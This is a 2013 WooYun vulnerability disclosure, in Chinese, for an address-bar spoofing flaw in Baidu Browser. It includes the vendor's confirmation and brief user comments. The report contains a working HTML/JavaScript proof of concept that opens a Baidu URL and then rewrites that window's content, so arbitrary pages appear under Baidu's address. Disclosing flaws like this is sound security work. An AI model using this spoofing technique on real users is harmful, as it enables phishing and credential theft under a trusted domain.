当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036273

漏洞标题:百度浏览器2.200.0.41563伪造任意网站钓鱼欺诈漏洞

相关厂商:百度

漏洞作者: blast

提交时间:2013-09-06 14:33

修复时间:2013-12-05 14:33

公开时间:2013-12-05 14:33

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-06: 细节已通知厂商并且等待厂商处理中
2013-09-08: 厂商已经确认,细节仅向厂商公开
2013-09-11: 细节向第三方安全合作伙伴开放
2013-11-02: 细节向核心白帽子及相关领域专家公开
2013-11-12: 细节向普通白帽子公开
2013-11-22: 细节向实习白帽子公开
2013-12-05: 细节向公众公开

简要描述:

百度浏览器伪造百度网站会不会很带感?无加载进度条,代码类似

详细说明:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>即将为你打开百度!~</title>
<script type="text/javascript">
var wx;
function invokePoC() {
wx = open("http://www.baidu.com:81/","newwin");
doit();
}
function doit() {
wx.document.open();
wx.document.write("<ti"+"tle>GOOGLE</title><iframe src='http://qq.com' width=95% height=95%>");
}
invokePoC();
</script>

</head>
</html>

漏洞证明:

f1.png

修复方案:

你们懂的

版权声明:转载请注明来源 blast@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-09-08 22:25

厂商回复:

感谢对百度安全的关注,我们马上处理此问题。
--“百度,因你更安全”

最新状态:

暂无


漏洞评价:

评论

  1. 2013-12-05 20:11 | NetSeif ( 实习白帽子 | Rank:45 漏洞数:13 | ‮(子帽白心核)

    啥意思??不都可以么。。

  2. 2013-12-05 21:03 | blast ( 普通白帽子 | Rank:348 漏洞数:57 | 五仁委员会)

    @NetSeif 所以说是国产浏览器的通病。。

  3. 2013-12-05 21:13 | NetSeif ( 实习白帽子 | Rank:45 漏洞数:13 | ‮(子帽白心核)

    @NetSeif Chrome也行啊。。。这个和<iframe>有啥区别??小白求解释。。

  4. 2013-12-05 21:14 | NetSeif ( 实习白帽子 | Rank:45 漏洞数:13 | ‮(子帽白心核)

    @NetSeif Chrome也行啊。。。这个和<iframe>有啥区别??小白求解释。。

  5. 2013-12-05 21:14 | NetSeif ( 实习白帽子 | Rank:45 漏洞数:13 | ‮(子帽白心核)

    咋还是@我自己呢。。。

  6. 2013-12-05 21:14 | NetSeif ( 实习白帽子 | Rank:45 漏洞数:13 | ‮(子帽白心核)

    @blast Chrome也行啊。。。这个和<iframe>有啥区别??小白求解释。。

  7. 2013-12-05 21:20 | blast ( 普通白帽子 | Rank:348 漏洞数:57 | 五仁委员会)

    @NetSeif 不可以吧 chrome是不显示地址的 或者地址显示about:blank吧 而这个地址虽然显示百度 但是内容可以随便改

  8. 2013-12-06 00:48 | NetSeif ( 实习白帽子 | Rank:45 漏洞数:13 | ‮(子帽白心核)

    哦,这个意思啊。。。